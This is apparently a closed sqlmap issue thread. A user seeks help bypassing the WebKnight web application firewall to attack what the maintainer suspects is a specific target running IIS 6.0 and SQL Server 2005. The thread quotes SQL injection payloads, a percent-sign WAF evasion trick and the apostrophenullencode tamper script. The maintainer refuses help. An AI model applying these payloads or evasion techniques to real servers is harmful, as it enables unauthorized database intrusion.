Closed angelz12 closed 9 years ago
If you don't have a solution to give I'll need to close this down
http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf http://www.exploit-db.com/papers/17934/
frequenzce for the bypass http://nl.ijs.si:3003/cuwi/dgt_en/frequencies/lc
this i found maybe this work...
A) http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf says When running the same test against WebKnight we had one successful attempt while using the ‘apostrophenullencode’ tamper script
-> so you can use --tamper=apostrophenullencode
which I doubt will work in your case
B) http://www.exploit-db.com/papers/17934/ says From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
-> this doesn't work. Correct me if I am wrong.
Please don't open this kind of Issues if you don't have a solution to give. Learn something about WAF bypasses and then come back. I'll just close further requests like this as invalid
p.s. its obvious from previous Issue requests that you have one target with WebKnight on it. Don't open this kind of Issue requests where you are openly asking for a help to attack a specific web server.
so thats the normal ‘apostrophenullencode’ how can i activate it the script bypass is green
""" Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """
from lib.core.enums import PRIORITY
priority = PRIORITY.LOWEST
def dependencies(): pass
def tamper(payload, **kwargs): """ Replaces apostrophe character with its illegal double unicode counterpart
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload
---------------------------------------------bypass of the pdf file i hope thats correct watch here-
‘apostrophenullencode’ change by pdf
""" Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """
from lib.core.enums import PRIORITY
priority = PRIORITY.LOWEST
def dependencies(): pass
def tamper(payload, **kwargs): """ Replaces apostrophe character with its illegal double unicode counterpart
>>> tamper(’ or ‘1’=’1)
'%00%27 or %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload
when i open these scripts in python the bypass is in green like a notice isnt it activatet? can u show me how can the bypass be runnig or i think wrong here?
web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005
http://www.aqtronix.com/?PageID=99